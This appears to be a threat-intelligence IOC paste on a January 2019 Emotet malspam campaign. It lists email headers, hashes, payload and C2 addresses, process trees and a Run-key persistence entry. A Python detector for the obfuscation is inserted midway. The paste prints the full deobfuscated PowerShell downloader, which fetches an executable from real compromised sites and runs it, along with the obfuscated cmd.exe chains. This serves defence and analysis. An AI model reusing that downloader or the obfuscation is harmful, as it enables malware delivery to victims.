- #IOC #OptiData #VR #emotet #feodo #banker #xml #powershell
- https://pastebin.com/D9TDts5J
- previous contact:
- 20/12/18 https://pastebin.com/EejcbL4t
- 04/12/18 https://pastebin.com/znQDtbnt
- 09/11/18 https://pastebin.com/THHMs2wg
- 01/10/18 https://pastebin.com/Y6DnbpHv
- FAQ:
- https://twitter.com/dvk01uk/status/1087660817452011520
- https://pastebin.com/g8gMJKui
- https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
- https://kc.mcafee.com/corporate/index?page=content&id=KB90108
- attack_vector
- --------------
- email attach .doc (XML) > macro > cmd > powershell_v5(!) > GET 5 URL > %temp%\***.exe
- email_headers
- --------------
- Received: from ded1262.inmotionhosting.com (ded1262.inmotionhosting.com [173.247.255.190])
- by srv8.victim1.com (8.15.2/8.15.2) for <user0@org7.victim1.com>;
- Thu, 24 Jan 2019 07:33:34 +0200 (EET)
- (envelope-from jonathan.contreras@grupodecme.com.mx)
- Received: from [104.152.233.226] (port=53273 helo=10.15.58.80)
- by ded1262.inmotionhosting.com with esmtpsa
- (envelope-from <jonathan.contreras@grupodecme.com.mx>)
- for user0@org7.victim1.com;
- Wed, 23 Jan 2019 07:49:42 -0800
- Date: Wed, 23 Jan 2019 07:49:38 -0800
- From: С ув.Андрей Сикорский 066-105-91-55,093-992-66-84 b2motor.com <jonathan.contreras@grupodecme.com.mx>
- To: user0@org7.victim1.com
- Subject: Aw: Outstanding INVOICE XPAHS/2921629/1194
- files
- --------------
- SHA-256 339c428878402bf90c1ff0653d51626cfa6adff27a13adf75a42ed26d138b59f
- File name FILE-T00978774.doc
- File size 258.31 KB
- SHA-256 1e95b89a23fc36786d336b4bfd4c0a6fb84630bb62e34270da6b604fd9bf7d8a
- File name aBQ0J3QEI0nmVgZS0xq.exe [from galvanengenharia.com 1st]
- File size 229.5 KB
- SHA-256 f8e3c1cf0eafcbd54f0e26dbb7ca108a0a3f3a97546504af8a9e03ee75949189
- File name XisJxx7N143.exe [from imarketsforextrading.com]
- File size 238.5 KB
- SHA-256 829c9c9d7d1f238e97bd3307392dad0f1537906505b694f1199ec9ddbee3bd52
- File name f76rt7cruttl6.exe [from galvanengenharia.com 2nd]
- File size 242 KB
- activity
- **************
- powershell
- powershtll
- deobfuscated_macro
- --------------
- command: powershell $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='imarketsforextrading{.} com/vpFtztlmbWLmXZWL@gencbafralilar{.} com/wp-admin/css/MSTealncf2Y_JI@north-bear{.} ru/SLiZjYZC4ZYAVon@galvanengenharia{.} com/NLuJg0pMQ6qrvYd4G_c0@nancybrouwer{.} nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
- pl_src: 1/5
- --------------
- imarketsforextrading{.} com/vpFtztlmbWLmXZWL/ not_downld
- gencbafralilar{.} com/wp-admin/css/MSTealncf2Y_JI 404
- north-bear{.} ru/SLiZjYZC4ZYAVon 503
- galvanengenharia{.} com/NLuJg0pMQ6qrvYd4G_c0/ 200
- nancybrouwer{.} nl/D8LOhbAH25ha blocked
- C2:
- --------------
- 182.180.170.72:22
- 189.253.39.50:8080
- netwrk
- --------------
- 104.225.130.135 www.imarketsforextrading.com GET /vpFtztlmbWLmXZWL HTTP/1.1 noUA
- 5.250.241.110 gencbafralilar.com GET /wp-admin/css/MSTealncf2Y_JI HTTP/1.1 noUA
- 92.53.114.3 north-bear.ru GET /SLiZjYZC4ZYAVon HTTP/1.1 noUA
- 191.6.205.20 galvanengenharia.com GET /NLuJg0pMQ6qrvYd4G_c0 HTTP/1.1 noUA
- 189.253.39.50 189.253.39.50:8080 GET / HTTP/1.1 Mozilla/4.0
- comp
- --------------
- powershtll.exe 1152 104.225.130.135 80 ESTABLISHED
- powershtll.exe 1152 5.250.241.110 80 ESTABLISHED
- powershtll.exe 1152 92.53.114.3 80 ESTABLISHED
- powershtll.exe 1152 191.6.205.20 80 ESTABLISHED
- turnedbased.exe 2488 182.180.170.72 22 SYN_SENT
- turnedbased.exe 2488 189.253.39.50 8080 ESTABLISHED
- proc
- --------------
- c:\rjbv\qwqqb\mclaw\..\..\..\windows\system32\cmd.exe /c CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u{(XinhY$.byo1pq_)Ac6ETS3vH2V0+g,~ZGOQa=J z\l-wjL}/tf;m8MWIs&&for %X in (...)do set p0QM=!p0QM!!78QN:~%X,1!&&if %X gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
- CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u{(XinhY$.byo1pq_)Ac6ETS3vH2V0+g,~ZGOQa=J z\l-wjL}/tf;m8MWIs&&for %X in (...)do set p0QM=!p0QM!!78QN:~%X,1!&&if %X gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
- C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://gencbafralilar.com/wp-admin/css/MSTealncf2Y_JI@http://north-bear.ru/SLiZjYZC4ZYAVon@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0@http://nancybrouwer.nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';"
- C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd') DO %e "
- C:\Windows\system32\cmd.exe /c assoc.cmd
- cmd
- powershtll $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://gencbafralilar.com/wp-admin/css/MSTealncf2Y_JI@http://north-bear.ru/SLiZjYZC4ZYAVon@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0@http://nancybrouwer.nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
- C:\tmp\168.exe
- C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe
- (old)
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- c:\rjbv\qwqqb\mclaw\..\..\..\windows\system32\cmd.exe .... gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
- CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u... gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
- C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll ...
- C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd') DO %e "
- C:\Windows\system32\cmd.exe /c assoc.cmd
- C:\Windows\system32\cmd.exe powershell $ntij='vcshw';$fkkv=new-object Net.WebClient;... $jbbj=$env:temp+'\'+$bddaq+'.exe';... {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
- "C:\Users\operator\AppData\Local\Temp\168.exe"
- "C:\Users\operator\AppData\Local\Temp\168.exe"
- "C:\Users\operator\AppData\Local\wabmetagen\wabmetagen.exe"
- "C:\Users\operator\AppData\Local\wabmetagen\wabmetagen.exe"
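Added example, not part of the paste: a small Python checker for the two traits the proc section and the deobfuscated macro show, the `pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll` env-substring trick that assembles the word "powershell" in cmd.exe, and the `Net.WebClient`/`DownloadFile`/`$env:temp`/`Invoke-Item` downloader. The sample command lines are abridged from the page; the environment values it resolves against are assumed Windows defaults, not values from the victim host.

```python
import re

# Constructed samples, abridged from the "proc" section. ASSUMED_ENV holds
# assumed default Windows values (not from the page) so the %VAR:~n,m% pieces
# can be resolved the way cmd.exe would resolve them on a typical host.
ASSUMED_ENV = {"PUBLIC": r"C:\Users\Public", "SESSIONNAME": "Console",
               "TEMP": r"C:\Users\operator\AppData\Local\Temp"}
SAMPLES = [
    r'''C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0'.Split('@');$jbbj=$env:temp+'\'+'168'+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;break;}}catch{}}"''',
    r'''CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u... gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "''',
    r"powershell.exe -NoProfile -Command Get-Date",  # benign control line
]

ENV_SUBSTR = re.compile(r"%(\w+):~(-?\d+)(?:,(-?\d+))?%")
DOWNLOADER_MARKERS = ("net.webclient", ".downloadfile(", "$env:temp", "invoke-item")

def expand_env_substrings(cmdline, env):
    """Resolve cmd.exe %VAR:~start,len% expansions; negative values count from the end."""
    def repl(m):
        val = env.get(m.group(1).upper(), "")
        tail = val[int(m.group(2)):]
        return tail[:int(m.group(3))] if m.group(3) is not None else tail
    return ENV_SUBSTR.sub(repl, cmdline)

def extract_urls(cmdline):
    """Pull the '@'-joined URL list that the macro splits with .Split('@')."""
    m = re.search(r"'([^']+)'\.Split\('@'\)", cmdline)
    return m.group(1).split("@") if m else []

def analyze_cmdline(cmdline, env=ASSUMED_ENV):
    """Score one process command line for the obfuscation and downloader traits of this chain."""
    low = cmdline.lower()
    f = {
        "env_substring": bool(ENV_SUBSTR.search(cmdline)),      # pow%PUBLIC:~5,1%r... builds a name
        "delayed_expansion": "/v:" in low and "!" in cmdline,    # cmd /V: with !var:~n,1! char-by-char
        "downloader_markers": [k for k in DOWNLOADER_MARKERS if k in low],
        "urls": extract_urls(cmdline),
        "resolved": expand_env_substrings(cmdline, env),        # what cmd.exe would actually run
    }
    f["suspicious"] = f["env_substring"] or f["delayed_expansion"] or len(f["downloader_markers"]) >= 3
    return f

if __name__ == "__main__":
    for s in SAMPLES:
        r = analyze_cmdline(s)
        print(r["suspicious"], r["downloader_markers"], r["urls"], r["resolved"][:70])
```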
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25.01.2019 14:39
- turnedbased 3dfxTools Common Library 3dfx Interactive, Inc.
- c:\users\operator\appdata\local\turnedbased\turnedbased.exe 25.01.2019 22:40
- drop
- --------------
- C:\tmp\168.exe
- C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe
- # # #
- https://www.virustotal.com/#/file/339c428878402bf90c1ff0653d51626cfa6adff27a13adf75a42ed26d138b59f/details
- https://www.virustotal.com/#/file/1e95b89a23fc36786d336b4bfd4c0a6fb84630bb62e34270da6b604fd9bf7d8a/details
- https://analyze.intezer.com/#/analyses/af88b324-e56b-4fd1-a8af-25a97d0163f2
- https://www.virustotal.com/#/file/f8e3c1cf0eafcbd54f0e26dbb7ca108a0a3f3a97546504af8a9e03ee75949189/details
- https://analyze.intezer.com/#/analyses/20ce9259-1f35-41b9-8eb1-7d1408865a77
- https://www.virustotal.com/#/file/829c9c9d7d1f238e97bd3307392dad0f1537906505b694f1199ec9ddbee3bd52/details
- https://analyze.intezer.com/#/analyses/200c4e09-f2ea-42c2-a803-1f98537d92af
- VR
- @